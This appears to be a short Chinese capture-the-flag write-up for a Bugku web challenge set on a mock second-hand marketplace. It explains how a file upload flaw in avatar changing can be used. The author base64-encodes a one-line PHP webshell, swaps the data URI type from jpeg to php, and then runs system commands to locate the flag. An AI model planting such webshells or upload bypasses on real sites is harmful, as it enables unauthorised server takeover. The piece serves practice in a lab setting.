Bugku WEB xxx二手交易市场

1.打开场景,发现是一个二手交易市场,常用思路是商品信息啥的,后台登录啥的,sql注入啥的,反正一通尝试,发现在注册后更换头像时存在上传漏洞,,抓包改包那么就可以拿到shell,注意这里需要把一句话木马base64编码,data:image/jpeg,可以指定文件后缀,将jpeg改为php后后台就会将其解析为php文件
一句话<?php eval($_REQUEST[8]) ?>
这里要注意,提升上去的system()后面要加;收尾,否则会报错,不知道为啥,大佬可以给个评论
2.据说蚁剑菜刀啥的都不好使,所以需要自己手动注入,根据带过去的参数执行系统命令
跟上一题一样,用more./*|grep flag,可以唱看当前目录下是否存在文件里有flag的内容
或者可以用find 命令找出flag文件所在的路径
find / -name flag*
这题没有过滤系统函数,system即可用
参考视频链接:https://www.bilibili.com/video/BV16B4y1T7Qm/

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值